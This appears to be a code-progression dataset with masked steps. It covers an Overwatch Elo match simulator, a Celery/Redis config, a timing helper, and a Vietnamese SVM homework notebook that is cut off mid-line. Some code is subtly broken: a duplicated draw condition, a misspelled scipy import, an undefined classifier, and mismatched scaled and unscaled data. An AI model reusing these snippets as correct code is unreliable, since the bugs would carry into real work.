self.maptype_elos = {t:{m:season.maptype_elos[t][m] for m in maptypes} for t in teams}\n self.mapname_elos = {t:{m:season.mapname_elos[t][m] for m in mapnames} for t in teams}\n\n self.map_draws = {m:[season.map_draws[m][0],season.map_draws[m][1]] for m in mapnames}\n self.margins_of_victory = [x for x in season.margins_of_victory]\n\n self.standings = {t:{'w':season.standings[t]['w'],'l':season.standings[t]['l'],'d':season.standings[t]['d']} for t in teams}\n\n def calculateElos(self):\n def applyStageDecay():\n for t in teams:\n self.overall_elos[t]*=decay_factor\n for m in mapnames:\n self.mapname_elos[t][m]*=decay_factor\n for m in maptypes:\n self.maptype_elos[t][m]*=decay_factor\n\n for i in range(4):\n stage = self.matchdata['stages'][i]\n applyStageDecay()\n for t in teams: self.elorecords[t][i].append(self.overall_elos[t])\n\n for match in stage['regular']+stage['playoffs']:\n if not match['completed']: continue\n\n t1, t2 = match['t1'], match['t2']\n\n if i==3:\n self.stage4played[t1]+=1\n self.stage4played[t2]+=1\n\n # Season Standing W/L\n if match in stage['regular']:\n if len([x for x in match['maps'] if x['result']=='t1'])>len([x for x in match['maps'] if x['result']=='t2']):\n self.standings[t1]['w']+=1\n self.standings[t2]['l']+=1\n else:\n self.standings[t1]['l']+=1\n self.standings[t2]['w']+=1\n\n for map in match['maps']:\n t1_elo = (self.overall_elos[t1]*overall_weight + \n self.mapname_elos[t1][map['mapname']]*mapname_weight + \n self.maptype_elos[t1][map['maptype']]*maptype_weight)\n t2_elo = (self.overall_elos[t2]*overall_weight + \n self.mapname_elos[t2][map['mapname']]*mapname_weight + \n self.maptype_elos[t2][map['maptype']]*maptype_weight)\n\n exp_t1 = 1/(1+10**((t2_elo-t1_elo)/d)) # Expected Scores\n exp_t2 = 1/(1+10**((t1_elo-t2_elo)/d))\n\n act_t1 = 1 if map['result']=='t1' else 0 if map['result']=='t2' else 0.5 # Actual Scores\n act_t2 = 1 if map['result']=='t2' else 0 if map['result']=='t1' else 0.5\n\n self.map_draws[map['mapname']][0] += 1 if act_t1==0.5 else 0 # Draw %\n self.map_draws[map['mapname']][1] += 1\n\n if match in stage['regular']:\n self.standings[t1]['d']+= 1 if map['result']=='t1' else -1 if map['result']=='t2' else 0 # Standings Differential\n self.standings[t2]['d']+= 1 if map['result']=='t2' else -1 if map['result']=='t1' else 0\n\n MoV = 1 # Margin of Victory\n elo_dif = 0 # Elo Difference\n if act_t1==1: # The team that won determines the margin of victory\n MoV = (map['deaths'][t2]+1)/(map['deaths'][t1]+1)\n elo_dif = t1_elo-t2_elo\n elif act_t2==1:\n MoV = (map['deaths'][t1]+1)/(map['deaths'][t2]+1)\n elo_dif = t2_elo-t1_elo\n else: # In case of a draw, the team with higher elo determines margin of \"victory\"\n if t1_elo>t2_elo:\n MoV = (map['deaths'][t2]+1)/(map['deaths'][t1]+1)\n elo_dif = t1_elo-t2_elo\n elif t1_elo>t2_elo:\n MoV = (map['deaths'][t1]+1)/(map['deaths'][t2]+1)\n elo_dif = t2_elo-t1_elo\n\n self.margins_of_victory.append(MoV)\n \n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n\n self.overall_elos[t1] += t1_change\n self.maptype_elos[t1][map[\"maptype\"]] += t1_change\n self.mapname_elos[t1][map[\"mapname\"]] += t1_change\n\n self.overall_elos[t2] += t2_change\n self.maptype_elos[t2][map[\"maptype\"]] += t2_change\n self.mapname_elos[t2][map[\"mapname\"]] += t2_change\n\n self.elorecords[t1][i].append(self.overall_elos[t1])\n self.elorecords[t2][i].append(self.overall_elos[t2])\n\n def getMapType(self,name):\n types = {\n **dict.fromkeys(['hanamura','horizon-lunar-colony','temple-of-anubis','volskaya','paris'],'assault'),\n **dict.fromkeys(['dorado','junkertown','rialto','route-66','gibraltar','Havana'],'escort'),\n **dict.fromkeys(['blizzard-world','eichenwalde','hollywood','kings-row','numbani'],'hybrid'),\n **dict.fromkeys(['busan','ilios','lijiang','nepal','oasis'],'control')\n }\n\n return types[name]\n \n def predictMatch(self,team1, team2, maps, loops = 10000):\n results = {}\n team1wins = 0\n maptypes = list(map(self.getMapType,maps))\n\n for x in range(loops):\n team1score = 0\n team2score = 0\n\n for i in range(len(maps)):\n drawchance = self.map_draws[maps[i]][0]/self.map_draws[maps[i]][1]\n\n elo1 = (self.overall_elos[team1]*overall_weight + \n self.mapname_elos[team1][maps[i]]*mapname_weight + \n self.maptype_elos[team1][maptypes[i]]*maptype_weight)\n elo2 = (self.overall_elos[team2]*overall_weight + \n self.mapname_elos[team2][maps[i]]*mapname_weight + \n self.maptype_elos[team2][maptypes[i]]*maptype_weight)\n \n random_roll = random.random()\n team1winchance = 1/(1+10**((elo2-elo1)/d))\n\n #drawchance *= min(team1winchance,1-team1winchance)*2\n\n if random_roll < team1winchance - drawchance/2: team1score +=1\n elif random_roll < team1winchance + drawchance/2: pass\n else: team2score +=1\n \n if team1score==team2score:\n map5 = random.choice([m for m in ['ilios','busan','lijiang'] if m not in maps])\n\n elo1 = (self.overall_elos[team1]*overall_weight +\n self.maptype_elos[team1]['control']*maptype_weight +\n self.mapname_elos[team1][map5]*mapname_weight)\n elo2 = (self.overall_elos[team2]*overall_weight +\n self.maptype_elos[team2]['control']*maptype_weight +\n self.mapname_elos[team2][map5]*mapname_weight)\n\n if random.random()< 1/(1+10**((elo2-elo1)/d)): team1score+=1\n else: team2score +=1\n \n scoreline = \"{}-{}\".format(team1score,team2score)\n if scoreline not in results: results[scoreline]=0\n results[scoreline]+=1\n if team1score>team2score: team1wins += 1 \n\n \n results = {s:results[s]/loops for s in results}\n return results, team1wins/loops\n\n def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4):\n '''\n Type can be regular, or playoffs.\n It is assumed team1 is the higher seed.\n '''\n\n types = [self.getMapType(m) for m in maps]\n\n score = [0,0]\n\n def simulateMap(mapname,maptype):\n elo1 = (self.overall_elos[team1]*overall_weight + \n self.mapname_elos[team1][mapname]*mapname_weight + \n self.maptype_elos[team1][maptype]*maptype_weight)\n elo2 = (self.overall_elos[team2]*overall_weight + \n self.mapname_elos[team2][mapname]*mapname_weight + \n self.maptype_elos[team2][maptype]*maptype_weight)\n \n random_roll = random.random()\n team1winchance = 1/(1+10**((elo2-elo1)/d))\n drawchance = self.map_draws[mapname][0]/self.map_draws[mapname][1] * min(team1winchance,1-team1winchance)*2\n\n if random_roll < team1winchance - drawchance/2: act_t1, act_t2 = 1,0\n elif random_roll < team1winchance + drawchance/2: act_t1, act_t2 = 0.5,0.5\n else: act_t1, act_t2 = 0,1\n \n if updateelos:\n MoV = random.choice(self.margins_of_victory)\n\n exp_t1 = 1/(1+10**((elo2-elo1)/d)) # Expected Scores\n exp_t2 = 1/(1+10**((elo1-elo2)/d))\n\n if act_t1==1: elo_dif = elo1-elo2\n elif act_t2==1: elo_dif = elo2-elo1\n else:\n if elo1>elo2: elo_dif = elo1-elo2\n elif elo1>elo2: elo_dif = elo2-elo1\n else: elo_dif = 0\n\n mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1)\n t1_change = k * (act_t1 - exp_t1) * mult\n t2_change = k * (act_t2 - exp_t2) * mult\n \n self.overall_elos[team1] += t1_change\n self.maptype_elos[team1][maptype] += t1_change\n self.mapname_elos[team1][mapname] += t1_change\n\n self.overall_elos[team2] += t2_change\n self.maptype_elos[team2][maptype] += t2_change\n self.mapname_elos[team2][mapname] += t2_change\n\n return round(act_t1),round(act_t2)\n \n if type=='regular':\n for i in range(len(maps)):\n score1,score2 = simulateMap(maps[i],types[i])\n score[0]+=score1\n score[1]+=score2\n \n if score[0]==score[1]:\n map5 = random.choice([x for x in mapnames if self.getMapType(x)=='control' and x not in maps])\n score1,score2 = simulateMap(map5,'control')\n score[0]+=score1\n score[1]+=score2\n \n if score[0]>score[1]:\n self.standings[team1]['w']+=1\n self.standings[team2]['l']+=1\n else:\n self.standings[team1]['l']+=1\n self.standings[team2]['w']+=1\n \n self.standings[team1]['d']+=score[0]-score[1]\n self.standings[team2]['d']+=score[1]-score[0]\n\n if type=='playoffs':\n mappreferences = {t:{mt:[x for x in postseasonmappool if self.getMapType(x)==mt] for mt in maptypes} for t in [team1,team2]}\n for t in [team1,team2]:\n for mt in maptypes:\n mappreferences[t][mt].sort(key=lambda x:self.mapname_elos[t][x]-self.mapname_elos[{team1:team2,team2:team1}[t]][x],reverse=True)\n\n mapprogression = ['control','hybrid','assault','escort']\n\n scores = [0,0]\n mnum = 0\n played = []\n picker = team1\n\n while max(score)<firstto:\n mtype = mapprogression[mnum%4]\n mname = [m for m in mappreferences[picker][mtype] if m not in played][0]\n played.append(mname)\n mnum += 1\n\n score1,score2 = simulateMap(mname,mtype)\n\n if score1==1:\n picker=team2\n score[0]+=1\n elif score2==1:\n picker=team1\n score[1]+=1\n\n if score[0]>score[1]: return [team1,team2]\n else: return [team2,team1]\n\n return\n", "step-ids": [ 5, 7, 8, 9, 10 ] }
[ 5, 7, 8, 9, 10 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> broker_url = 'redis://120.78.168.67/10' CELERY_RESULT_BACKEND = 'redis://120.78.168.67/0' CELERY_TIMEZONE = 'Asia/Shanghai' <|reserved_special_token_1|> # Celery配置文件 # 指定消息队列为Redis broker_url = "redis://120.78.168.67/10" CELERY_RESULT_BACKEND = "redis://120.78.168.67/0" CELERY_TIMEZONE = 'Asia/Shanghai'
flexible
{ "blob_id": "095374aa7613f163fedbd7d253219478108d4f42", "index": 992, "step-1": "<mask token>\n", "step-2": "broker_url = 'redis://120.78.168.67/10'\nCELERY_RESULT_BACKEND = 'redis://120.78.168.67/0'\nCELERY_TIMEZONE = 'Asia/Shanghai'\n", "step-3": "# Celery配置文件\n\n# 指定消息队列为Redis\nbroker_url = \"redis://120.78.168.67/10\"\nCELERY_RESULT_BACKEND = \"redis://120.78.168.67/0\"\nCELERY_TIMEZONE = 'Asia/Shanghai'\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def time_func(func, arg): start = time.time() func(arg) return time.time() - start <|reserved_special_token_1|> import time def time_func(func, arg): start = time.time() func(arg) return time.time() - start <|reserved_special_token_1|> import time # Returns time in seconds for func(arg) to run def time_func(func, arg): start = time.time() func(arg) return time.time() - start
flexible
{ "blob_id": "7f406c1cd4d56da3a7d5f8739e0b65b0e61cf637", "index": 5290, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n", "step-3": "import time\n\n\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n", "step-4": "import time\n\n# Returns time in seconds for func(arg) to run\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> df.pivot_table(index=['classes'], aggfunc='size') <|reserved_special_token_0|> for n in np.arange(0.5, C_parameter, 0.5): clf = svm.SVC(C=n).fit(X_train, y_train) yhat = clf.predict(X_test) cnf_matrix = confusion_matrix(y_test, yhat) mean_acc.append(float(accuracy_score(y_test, yhat))) print('Result with C = ' + str(n)) np.set_printoptions(precision=2) print(classification_report(y_test, yhat)) print('The best accuracy was with', max(mean_acc), 'with C=', n) <|reserved_special_token_0|> lin_clf.fit(X_train, y_train) <|reserved_special_token_0|> accuracy_score(y_train, y_pred) <|reserved_special_token_0|> accuracy_score(y_test, y_test_predict) <|reserved_special_token_0|> lin_clf.fit(X_train, y_train) <|reserved_special_token_0|> accuracy_score(y_train, y_pred) <|reserved_special_token_0|> accuracy_score(y_test, y_test_predict) <|reserved_special_token_0|> rnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000]) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> df = pd.read_csv('thyroid_sick.csv') X = df[[column_name for column_name in df.columns if column_name != 'classes']] y = df[['classes']] X = preprocessing.StandardScaler().fit(X).transform(X.astype(float)) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42) df.pivot_table(index=['classes'], aggfunc='size') <|reserved_special_token_0|> C_parameter = 10.5 mean_acc = [] for n in np.arange(0.5, C_parameter, 0.5): clf = svm.SVC(C=n).fit(X_train, y_train) yhat = clf.predict(X_test) cnf_matrix = confusion_matrix(y_test, yhat) mean_acc.append(float(accuracy_score(y_test, yhat))) print('Result with C = ' + str(n)) np.set_printoptions(precision=2) print(classification_report(y_test, yhat)) print('The best accuracy was with', max(mean_acc), 'with C=', n) <|reserved_special_token_0|> mnist = fetch_openml('mnist_784', version=1, cache=True) X = mnist['data'] y = mnist['target'].astype(np.uint8) X_train = X[:60000] y_train = y[:60000] X_test = X[60000:] y_test = y[60000:] lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) y_test_predict = lin_clf.predict(X_test) accuracy_score(y_test, y_test_predict) Scaler = StandardScaler() X_train_scaled = Scaler.fit_transform(X_train.astype(np.float32)) X_test_scaled = Scaler.fit_transform(X_test.astype(np.float32)) lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) y_test_predict = lin_clf.predict(X_test_scaled) accuracy_score(y_test, y_test_predict) <|reserved_special_token_0|> param_distributions = {'gamma': reciprocal(0.001, 0.1), 'C': uniform(1, 10)} rnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2, cv=3) rnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000]) <|reserved_special_token_0|> housing = fetch_california_housing() X = housing['data'] y = housing['target'] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) <|reserved_special_token_1|> import pandas as pd from sklearn.model_selection import train_test_split from sklearn import preprocessing from sklearn.metrics import classification_report, confusion_matrix, accuracy_score import itertools import numpy as np from sklearn import preprocessing df = pd.read_csv('thyroid_sick.csv') X = df[[column_name for column_name in df.columns if column_name != 'classes']] y = df[['classes']] X = preprocessing.StandardScaler().fit(X).transform(X.astype(float)) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42) df.pivot_table(index=['classes'], aggfunc='size') from sklearn import svm C_parameter = 10.5 mean_acc = [] for n in np.arange(0.5, C_parameter, 0.5): clf = svm.SVC(C=n).fit(X_train, y_train) yhat = clf.predict(X_test) cnf_matrix = confusion_matrix(y_test, yhat) mean_acc.append(float(accuracy_score(y_test, yhat))) print('Result with C = ' + str(n)) np.set_printoptions(precision=2) print(classification_report(y_test, yhat)) print('The best accuracy was with', max(mean_acc), 'with C=', n) import numpy as np from sklearn.svm import LinearSVC from sklearn.datasets import fetch_openml from sklearn.metrics import accuracy_score from sklearn.preprocessing import StandardScaler mnist = fetch_openml('mnist_784', version=1, cache=True) X = mnist['data'] y = mnist['target'].astype(np.uint8) X_train = X[:60000] y_train = y[:60000] X_test = X[60000:] y_test = y[60000:] lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) y_test_predict = lin_clf.predict(X_test) accuracy_score(y_test, y_test_predict) Scaler = StandardScaler() X_train_scaled = Scaler.fit_transform(X_train.astype(np.float32)) X_test_scaled = Scaler.fit_transform(X_test.astype(np.float32)) lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) y_test_predict = lin_clf.predict(X_test_scaled) accuracy_score(y_test, y_test_predict) from sklearn.model_selection import RandomizedSearchCV from scipy.stats import reciproca, uniform from sklearn.model_selection import RandomizedSearchCV from scipy.stats import reciprocal, uniform from sklearn.svm import SVC param_distributions = {'gamma': reciprocal(0.001, 0.1), 'C': uniform(1, 10)} rnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2, cv=3) rnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000]) from sklearn.datasets import fetch_california_housing from sklearn.model_selection import train_test_split housing = fetch_california_housing() X = housing['data'] y = housing['target'] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) <|reserved_special_token_1|> # To add a new cell, type '# %%' # To add a new markdown cell, type '# %% [markdown]' # %% [markdown] # ### Bài tập 1. # - <ins>Yêu cầu</ins>: Ý tưởng cơ bản của thuật toán ``Support Vector Machine`` (``SVM``) là gì? Ý tưởng của thuật toán biên mềm (``soft margin``) ``SVM``. Nêu ý nghĩa của siêu tham số ``C`` trong bài toán cực tiểu hàm mất mát. # # 1. Ý tưởng cơ bản của SVM là đưa toàn bộ dataset vào không gian nhiều chiều (n chiều), từ đó tìm ra mặt phẳng thích hợp nhất (hyperplane) để phân chia # 2. Support Vector Machine thuần (hard margin) thì gặp hai vấn đề chính đó là nó chỉ hoạt động trên dataset ``Linearly Separable`` và thứ 2 đó là nó khá nhạy cảm với biến nhiễu (sensitive to noise). Để tránh vấn đề này, chúng ta cần sử dụng một mô hình linh hoạt # hơn. Nhiệm vụ của nó là tìm được mặt phẳng vẫn phân loại tốt nhưng chấp nhận sai lệch ở một mức độ chấp nhận được. # 3. Tham số `C` là hằng số dương giúp cân đối độ lớn của margin và sự hy sinh của các điểm nằm trong vùng không an toàn. Khi $C = \infty $ hoặc rất lớn, Soft Margin SVM trở thành Hard Margin SVM. # %% [markdown] # ### Bài tập 2. # - <ins>Yêu cầu</ins>: Sử dụng mô hình ``SVM`` thuộc thư viện ``sklearn`` để xây dựng mô hình phân loại dựa trên tập dữ liệu huấn luyện ``X_train``, ``y_train``. Hãy nhận xét về tỉ lệ nhãn ``0`` và ``1`` trong bộ dữ liệu đã cho như đoạn code bên dưới. Hãy thử thay đổi giá trị của tham số ``C`` và nhận xét các độ đo ``Recall``, ``Precison``, ``F1-score``, và ``Accuracy`` của mô hình thu được trên tập dữ liệu kiểm tra ``X_test``, ``y_test``. # - Nguồn tham khảo dữ liệu ``thyroid_sick.csv``: https://archive.ics.uci.edu/ml/datasets/Thyroid+Disease # %% import pandas as pd from sklearn.model_selection import train_test_split from sklearn import preprocessing from sklearn.metrics import classification_report, confusion_matrix, accuracy_score import itertools import numpy as np from sklearn import preprocessing # %% df = pd.read_csv('thyroid_sick.csv') X = df[[column_name for column_name in df.columns if column_name != 'classes']] y = df[['classes']] X = preprocessing.StandardScaler().fit(X).transform(X.astype(float)) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42) # %% df.pivot_table(index =['classes'], aggfunc='size') # %% [markdown] # * Nhận xét: # %% from sklearn import svm C_parameter = 10.5 mean_acc = [] for n in np.arange(0.5, C_parameter, 0.5): #Train Model and Predict clf = svm.SVC(C=n).fit(X_train,y_train) yhat=clf.predict(X_test) cnf_matrix = confusion_matrix(y_test, yhat) mean_acc.append(float(accuracy_score(y_test, yhat))) print("Result with C = " + str(n)) np.set_printoptions(precision=2) print (classification_report(y_test, yhat)) print( "The best accuracy was with", max(mean_acc), "with C=", n) # %% [markdown] # ### Bài tập 3. # - <ins>Yêu cầu</ins>: Ý tưởng của hàm ``kernel`` $K(\dots, \dots)$ là gì? Khi nào chúng ta áp dụng hàm ``kernel``? Chúng ta có cần biết biểu thức của hàm $\Phi(x)$ không? # 1. Kernel SVM là việc đi tìm một hàm số biến đổi dữ liệu $x$ từ không gian feature ban đầu thành dữ liệu trong một không gian mới bằng hàm số $\Phi(\mathbf{x})$. Hàm số này cần thoả mãn mục đích đó là tronng không gian mới, dữ liệu giữa hai classes là phân biệt tuyến tính hoặc gần như phần biệt tuyến tính. # 2. Chúng ta áp dụng hàm ``kernel`` khi dữ liệu không phân biệt tuyến tính, Với dữ liệu gần phân biệt tuyến tính, linear và poly kernels cho kết quả tốt hơn. # 3. # %% [markdown] # ### Bài tập 4. # - <ins>Yêu cầu</ins>: Cho điểm dữ liệu trong không gian hai chiều $x = [x_1, x_2]^T$ và hàm biến đổi sang không gian năm chiều $\Phi(x) = [1, \sqrt{2}x_1, \sqrt{2}x_2, x_1^2, \sqrt{2}x_1x_2, x_2^2]^T$. Hãy tính hàm ``kernel`` $K(a, b)$. # # \begin{eqnarray} # \Phi(\mathbf{x})^T\Phi(\mathbf{z}) &=& [1, \sqrt{2} x_1, \sqrt{2} x_2, x_1^2, \sqrt{2} x_1x_2, x_2^2] [1, \sqrt{2} z_1, \sqrt{2} z_2, z_1^2, \sqrt{2} z_1z_2, z_2^2]^T \\ # &=& 1 + 2x_1z_1 + 2x_2z_2 + x_1^2x_2^2 + 2x_1z_1x_2z_2 + x_2^2z_2^2 \\ # &=& (1 + x_1z_1 + x_2z_2)^2 = (1 + \mathbf{x}^T\mathbf{z})^2 = k(\mathbf{x}, \mathbf{z}) # \end{eqnarray} # %% [markdown] # ### Bài tập 5. # - <ins>Yêu cầu</ins>: Giả sử bạn dùng bộ phân loại ``SVM`` với hàm ``kernel`` (radial basis function) ``RBF`` cho tập huấn luyện và thấy mô hình phân loại chưa tốt. Để cải thiện, bạn sẽ giảm hay tăng tham số $\gamma$ trong công thức hàm ``kernel``, tham số ``C`` trong hàm mất mát. # %% [markdown] # ### Bài tập 6. (Exercise 9 trang 174, Chapter 5: Support Vector Machines) # - <ins>Yêu cầu</ins>: Huấn luyện một bộ phân lớp ``SVM`` dựa trên bộ dữ liệu ``MNIST`` (dùng để phân loại hình ảnh các ký tự số có cùng kích thước). Bởi vì bộ phân loại ``SVM`` là bộ phân lớp nhị phân, chúng ta sẽ cần sử dụng chiến thuật ``one-versus-the-rest`` để phân loại tất cả ``10`` ký tự số (trong thực tế chúng ta chỉ dùng chiến thuật ``one-versus-one`` trong các trường hợp dữ liệu nhỏ). Bạn hãy báo cáo độ chính xác (``accuracy``) của mô hình đã huấn luyện trên tập test. # %% import numpy as np from sklearn.svm import LinearSVC from sklearn.datasets import fetch_openml from sklearn.metrics import accuracy_score from sklearn.preprocessing import StandardScaler mnist = fetch_openml('mnist_784', version=1, cache=True) # %% X = mnist["data"] y = mnist["target"].astype(np.uint8) X_train = X[:60000] y_train = y[:60000] X_test = X[60000:] y_test = y[60000:] lin_clf = LinearSVC(random_state=42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) # %% y_test_predict =lin_clf.predict(X_test) accuracy_score(y_test, y_test_predict) # %% Scaler = StandardScaler() X_train_scaled = Scaler.fit_transform(X_train.astype(np.float32)) X_test_scaled = Scaler.fit_transform(X_test.astype(np.float32)) # %% lin_clf = LinearSVC(random_state =42) lin_clf.fit(X_train, y_train) y_pred = lin_clf.predict(X_train) accuracy_score(y_train, y_pred) # %% y_test_predict = lin_clf.predict(X_test_scaled) accuracy_score(y_test, y_test_predict) from sklearn.model_selection import RandomizedSearchCV from scipy.stats import reciproca, uniform from sklearn.model_selection import RandomizedSearchCV from scipy.stats import reciprocal, uniform from sklearn.svm import SVC param_distributions = {"gamma": reciprocal(0.001, 0.1), "C": uniform(1, 10)} rnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2, cv=3) rnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000]) # %% [markdown] # ### Bài tập 7. (Exercise 10 trang 174, Chapter 5: Support Vector Machines) # - <ins>Yêu cầu</ins>: Hãy huấn luyện một mô hình hồi quy tuyến tính với dữ liệu giá nhà ``California housing dataset``. # %% from sklearn.datasets import fetch_california_housing from sklearn.model_selection import train_test_split housing = fetch_california_housing() X = housing["data"] y = housing["target"] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
flexible
{ "blob_id": "1b1b646a75fe2ff8d54e66d025b60bde0c9ed2d6", "index": 9361, "step-1": "<mask token>\n", "step-2": "<mask token>\ndf.pivot_table(index=['classes'], aggfunc='size')\n<mask token>\nfor n in np.arange(0.5, C_parameter, 0.5):\n clf = svm.SVC(C=n).fit(X_train, y_train)\n yhat = clf.predict(X_test)\n cnf_matrix = confusion_matrix(y_test, yhat)\n mean_acc.append(float(accuracy_score(y_test, yhat)))\n print('Result with C = ' + str(n))\n np.set_printoptions(precision=2)\n print(classification_report(y_test, yhat))\nprint('The best accuracy was with', max(mean_acc), 'with C=', n)\n<mask token>\nlin_clf.fit(X_train, y_train)\n<mask token>\naccuracy_score(y_train, y_pred)\n<mask token>\naccuracy_score(y_test, y_test_predict)\n<mask token>\nlin_clf.fit(X_train, y_train)\n<mask token>\naccuracy_score(y_train, y_pred)\n<mask token>\naccuracy_score(y_test, y_test_predict)\n<mask token>\nrnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000])\n<mask token>\n", "step-3": "<mask token>\ndf = pd.read_csv('thyroid_sick.csv')\nX = df[[column_name for column_name in df.columns if column_name != 'classes']]\ny = df[['classes']]\nX = preprocessing.StandardScaler().fit(X).transform(X.astype(float))\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1,\n random_state=42)\ndf.pivot_table(index=['classes'], aggfunc='size')\n<mask token>\nC_parameter = 10.5\nmean_acc = []\nfor n in np.arange(0.5, C_parameter, 0.5):\n clf = svm.SVC(C=n).fit(X_train, y_train)\n yhat = clf.predict(X_test)\n cnf_matrix = confusion_matrix(y_test, yhat)\n mean_acc.append(float(accuracy_score(y_test, yhat)))\n print('Result with C = ' + str(n))\n np.set_printoptions(precision=2)\n print(classification_report(y_test, yhat))\nprint('The best accuracy was with', max(mean_acc), 'with C=', n)\n<mask token>\nmnist = fetch_openml('mnist_784', version=1, cache=True)\nX = mnist['data']\ny = mnist['target'].astype(np.uint8)\nX_train = X[:60000]\ny_train = y[:60000]\nX_test = X[60000:]\ny_test = y[60000:]\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\ny_test_predict = lin_clf.predict(X_test)\naccuracy_score(y_test, y_test_predict)\nScaler = StandardScaler()\nX_train_scaled = Scaler.fit_transform(X_train.astype(np.float32))\nX_test_scaled = Scaler.fit_transform(X_test.astype(np.float32))\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\ny_test_predict = lin_clf.predict(X_test_scaled)\naccuracy_score(y_test, y_test_predict)\n<mask token>\nparam_distributions = {'gamma': reciprocal(0.001, 0.1), 'C': uniform(1, 10)}\nrnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10,\n verbose=2, cv=3)\nrnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000])\n<mask token>\nhousing = fetch_california_housing()\nX = housing['data']\ny = housing['target']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,\n random_state=42)\n", "step-4": "import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nimport itertools\nimport numpy as np\nfrom sklearn import preprocessing\ndf = pd.read_csv('thyroid_sick.csv')\nX = df[[column_name for column_name in df.columns if column_name != 'classes']]\ny = df[['classes']]\nX = preprocessing.StandardScaler().fit(X).transform(X.astype(float))\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1,\n random_state=42)\ndf.pivot_table(index=['classes'], aggfunc='size')\nfrom sklearn import svm\nC_parameter = 10.5\nmean_acc = []\nfor n in np.arange(0.5, C_parameter, 0.5):\n clf = svm.SVC(C=n).fit(X_train, y_train)\n yhat = clf.predict(X_test)\n cnf_matrix = confusion_matrix(y_test, yhat)\n mean_acc.append(float(accuracy_score(y_test, yhat)))\n print('Result with C = ' + str(n))\n np.set_printoptions(precision=2)\n print(classification_report(y_test, yhat))\nprint('The best accuracy was with', max(mean_acc), 'with C=', n)\nimport numpy as np\nfrom sklearn.svm import LinearSVC\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nmnist = fetch_openml('mnist_784', version=1, cache=True)\nX = mnist['data']\ny = mnist['target'].astype(np.uint8)\nX_train = X[:60000]\ny_train = y[:60000]\nX_test = X[60000:]\ny_test = y[60000:]\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\ny_test_predict = lin_clf.predict(X_test)\naccuracy_score(y_test, y_test_predict)\nScaler = StandardScaler()\nX_train_scaled = Scaler.fit_transform(X_train.astype(np.float32))\nX_test_scaled = Scaler.fit_transform(X_test.astype(np.float32))\nlin_clf = LinearSVC(random_state=42)\nlin_clf.fit(X_train, y_train)\ny_pred = lin_clf.predict(X_train)\naccuracy_score(y_train, y_pred)\ny_test_predict = lin_clf.predict(X_test_scaled)\naccuracy_score(y_test, y_test_predict)\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciproca, uniform\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciprocal, uniform\nfrom sklearn.svm import SVC\nparam_distributions = {'gamma': reciprocal(0.001, 0.1), 'C': uniform(1, 10)}\nrnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10,\n verbose=2, cv=3)\nrnd_search_cv.fit(X_train_scaled[:1000], y_train[:1000])\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.model_selection import train_test_split\nhousing = fetch_california_housing()\nX = housing['data']\ny = housing['target']\nX_train, X_test, y_train, y_test = 